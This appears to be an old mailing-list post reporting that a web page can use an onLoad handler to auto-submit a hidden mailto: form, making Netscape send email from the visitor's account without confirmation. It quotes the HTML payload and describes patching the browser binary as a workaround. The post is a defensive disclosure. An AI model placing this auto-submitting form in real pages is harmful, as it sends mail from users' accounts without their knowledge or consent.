> I noticed, while loading a web page, that there was a mailto: URL active
> (using the "Easter Egg" Ctrl-Alt-T popup to see active URLs). Sure enough,
> after I cancelled that and examined the source, I saw something like this:
> <body onLoad="document.mailme.submit()">
> <form method=post name="mailme"
> action="mailto:nasty @
> <input type=hidden name="hi" value="there">
> A quick test on my local machine shows that this will send a message to
> nasty @
org with the subject gotcha and the body "hi=there".
I tested this on SunOS 4.1.3, and it sure works: the Netscape
onLoad function will send mail using your account name and
without asking for confirmation or even informing you.
I looked at the Netscape binary with od -s and emacs. The
string "onload" (all lower case) occurs 2 times on itself,
between null characters. When I patched it, changing the
first occurrence to "onxxad", the resulting binary did not any
more obey the "onLoad" directive and did not obey the "onxxad"
directive either. When I changed both occurrences of "onload"
to "onxxoad", the resulting binary did not obey the "onLoad"
directive, but it did obey the "onxxad" directive.
Note that the Netscape license agreement forbids you to :
"... * modify, translate, reverse engineer, decompile, disassemble
(except to the extent applicable laws specifically prohibit such
restriction), or create derivative works based on the Software; ..."
So if you patch Netscape to prevent it forging your mail, you
might be breaking the license. And of course this kind of binary
patching may easily break something else. At least it will break
any WWW pages which use the onLoad directive for some other,
more legitimate purpose.
So do not do it unless you know exactly what you are doing,
and do not blame me if it does not work or leads to a disaster!
If you are really concerned about this thing, consider sending
e-mail to Netscape Communications Corporation, explaining to them
the reasons why you think Netscape should not send mail using your
machine, address and account without asking for confirmation.